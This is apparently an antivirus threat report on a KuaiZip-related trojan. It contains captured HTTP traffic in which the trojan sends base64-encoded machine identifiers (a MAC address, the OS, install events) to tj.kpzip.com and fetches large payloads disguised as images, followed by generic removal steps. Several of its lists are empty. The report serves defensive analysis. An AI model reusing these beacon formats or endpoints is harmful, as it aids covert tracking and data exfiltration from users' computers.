Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:21:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="bjzy3"
Accept-Ranges: bytes
x-cdmi-object-size: 2198528
x-cdmi-create-time: 2016-03-13 14:08:34
Content-Length: 2198528
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
<<< skipped >>>
POST /kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9ydW4= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:51:52 GMT
c..{"status":1}..0..
POST /kuaizipreport/active?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLdWFpWmlwLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJRTQyODMyMTg3NTVCQzM3RTVDQTg4ODc1RjkxQkUzNzM= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:12 GMT
c..{"status":1}..0..
GET /large/6da25678gw1f1l8knvnatj20c80gbu12.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww3.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:22 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1013.v0-voz ( h0-s1008.v0-voz), ms h0-s1008.v0-voz ( h0-s1326.p0-kix), ht-d h0-s1326.p0-kix.cdngp.net
Cache-Control: max-age=7776000
Expires: Sat, 02 Jul 2016 16:05:12 GMT
Age: 697630
Accept-Ranges: bytes
Content-Length: 7238736
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=83.169.205.18,c=37.57.16.189
Connection: keep-alive
<<< skipped >>>
GET /large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww3.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:41 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1013.v0-voz ( h0-s1012.v0-voz), ms h0-s1012.v0-voz ( h0-s1346.p0-kix), ht-d h0-s1346.p0-kix.cdngp.net
Cache-Control: max-age=7776000
Expires: Sun, 03 Jul 2016 13:39:51 GMT
Age: 619971
Accept-Ranges: bytes
Content-Length: 7238736
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=83.169.205.18,c=37.57.16.189
Connection: keep-alive
<<< skipped >>>
GET /large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww1.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:23 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1005.v0-voz ( h0-s1001.v0-voz), ms h0-s1001.v0-voz ( h0-s1345.p0-kix), ht-d h0-s1345.p0-kix.cdngp.net
Cache-Control: max-age=7776000
Expires: Thu, 02 Jun 2016 16:11:40 GMT
Age: 3289243
Accept-Ranges: bytes
Content-Length: 8045184
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=83.169.205.8,c=37.57.16.189
Connection: keep-alive
<<< skipped >>>
POST /kuaizipreport/online?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCUU0MjgzMjE4NzU1QkMzN0U1Q0E4ODg3NUY5MUJFMzczCSgwPVhQMywxPWFkbSwyPTE0NjAzOTcyNzMsMTQ2MDM5NzI5NiwxNDYwMzk3MzAwKQ== HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:17 GMT
c..{"status":1}..0..
GET /stat/index.php?pcid=630eda2537585b8645a6e7879b8a0d8b&app=kuaizip&ver=2.8.14.2&channel=union123_0088&category=KuaiZip.exe&act=app_open&p1=&p2=&key=2f5e2aa5d66794c2de4340db01f67516 HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Host: stat.kpzip.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Server: nginx/1.4.1
Date: Mon, 11 Apr 2016 17:53:11 GMT
Content-Type: text/html
Content-Length: 172
Connection: close
<html>..<head><title>400 Bad Request</title></head>..<body bgcolor="white">..<center><h1>400 Bad Request</h1></center>..<hr><center>nginx/1.4.1</center>..</body>..</html>....
POST /kuaizipreport/install?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTEJMAlFNDI4MzIxODc1NUJDMzdFNUNBODg4NzVGOTFCRTM3MwkxCUt1YWlaaXBfU2V0dXBfdW5pb24xMjNfMDA4OC5leGUJL0ppbmdNbw== HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:17 GMT
c..{"status":1}..0..
GET /large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww4.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:24 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1150.p11-fra ( h0-s1158.p11-fra), ht-d h0-s1158.p11-fra.cdngp.net
Cache-Control: max-age=7776000
Expires: Sun, 05 Jun 2016 17:55:35 GMT
Age: 3023809
Accept-Ranges: bytes
Content-Length: 9059732
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=151.249.89.195,c=37.57.16.189
Connection: keep-alive
<<< skipped >>>
POST /kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTIzNDVoYW96aXAtMDAwfDM2MHppcC0wMDB8N3otMDAwfFdpblJBUi0wMDB8MzYwQVFXUy0wMDA= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:22 GMT
c..{"status":1}..0..
The Trojan connects to the servers at the following location(s):
duba_u20862342_sv1_3_18.exe_632:
duba_u20862342_sv1_3_18.exe_632_rwx_00401000_0015B000:
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.